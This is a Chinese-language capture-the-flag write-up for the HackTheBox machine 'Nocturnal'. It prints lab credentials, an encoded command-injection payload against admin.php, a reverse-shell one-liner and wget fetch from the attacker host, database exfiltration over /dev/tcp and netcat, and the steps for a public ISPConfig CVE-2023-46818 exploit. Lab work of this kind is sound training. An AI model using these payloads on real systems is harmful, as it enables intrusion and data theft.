Nocturnal

admin
admin
admin
145318
文章
119
评论
2025年6月2日01:25:29评论45 views字数 2113阅读7分2秒阅读模式

Nocturnal

https://app.hackthebox.com/machines/Nocturnal

受害者ip:10.10.11.64

攻击者ip:10.10.16.5

端口扫描

nmap -sV -sC -Pn -p- --min-rate=500 10.10.11.64

echo "10.10.11.64 nocturnal.htb" >> /etc/hosts 

Nocturnal

子域名扫描

wfuzz --/usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u "http://nocturnal.htb/" -H "HostFUZZ.nocturnal.htb" -t 500 --hc 302,400

Nocturnal

目录扫描

dirsearch -u http://nocturnal.htb/

Nocturnal

80页面可以上传word,pdf等文档

Nocturnal

注册页面如果用户名存在则提示Failed to register user

注册admin失败了,说明存在admin用户,尝试弱口令爆破一下

Nocturnal

Nocturnal

随便注册一个账号登录进去,上传pdf,成功上传后给了一个路径,访问后就是直接下载文件

nocturnal.htb/view.php?username=xxs&file=shell5.0.pdf

Nocturnal

修改file参数只会提示无效的文件的扩展。 

Nocturnal

接下来修改username参数,修改不存在的用户名会提示用户没有找到。修改成存在的用户如admin,可以直接看到他可以下载的文件,接下来可以对该参数进行爆破用户名

Nocturnal

Nocturnal

爆破用户名

ffuf -u "http://nocturnal.htb/view.php?username=FUZZ&file=shell5.0.pdf/" -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -H "Cookie: PHPSESSID=2ainut7iecp2dpcjgrst6h6itp" -fs 2985            

Nocturnal

http://nocturnal.htb/view.php?username=amanda&file=privacy.odt

下载文件privacy.odt

Nocturnal

使用odt2txt 命令提取纯文本内容

发现账号密码amanda:arHkG7HAI68X8s1J

Nocturnal

使用密码登录amanda并下载到备份文件,解压也是一样的密码

Nocturnal

Nocturnal

审计admin.php发现过滤不完全,可以导致password 直接拼接到 command 

Nocturnal

使用编码绕过:password=%0Abash%09-c%09"id"%0A&backup=

Nocturnal

直接执行反弹shell命令会报错,下载一个包含反弹shell命令的文件再让去他执行此文件

shell.sh内容            bash -i >& /dev/tcp/10.10.16.59/1111 0>&1            password=%0abash%09-c%09"wget%09http://10.10.16.59/shell.sh"&backup=            password=%0abash%09-c%09"bash%09shell.sh"%0a&backup=            

Nocturnal

Nocturnal

Nocturnal

反弹成功

Nocturnal

/var/www/nocturnal_database中找到数据库文件

cat nocturnal_database.db > /dev/tcp/10.10.16.59/2222            nc -lnvp 2222> nocturnal_database.db            

Nocturnal

md5解密

tobias:slowmotionapocalypse

55c82b1ccd55ab219b3b109b07d5061d:slowmotionapocalypse

Nocturnal

Nocturnal

ssh连接tobias

ssh [email protected]

Nocturnal

ss -tuln发现还开启了8080端口

Nocturnal

端口转发

ssh [email protected] -L 8080:localhost:8080

进入后是ispconfig的页面

Nocturnal

在源代码中看到版本是3.2

Nocturnal

找到了CVE-2023-46818

https://github.com/bipbopbup/CVE-2023-46818-python-exploit

Nocturnal

Nocturnal

Nocturnal

条件是要有账号密码,目前已知的账号密码有

tobias:slowmotionapocalypse

amanda:arHkG7HAI68X8s1J

ISPConfig默认账号密码admin:admin

Nocturnal

经过尝试,tobias的密码可以复用

admin:slowmotionapocalypse

Nocturnal

命令一把梭获得root

git clone https://github.com/bipbopbup/CVE-2023-46818-python-exploit.git            cd CVE-2023-46818-python-exploit            python3 exploit.py http://127.0.0.1:8080/ admin slowmotionapocalypse            cat /root/root.txt            

Nocturnal

原文始发于微信公众号(王之暴龙战神):Nocturnal

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月2日01:25:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Nocturnalhttps://cn-sec.com/archives/4118870.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息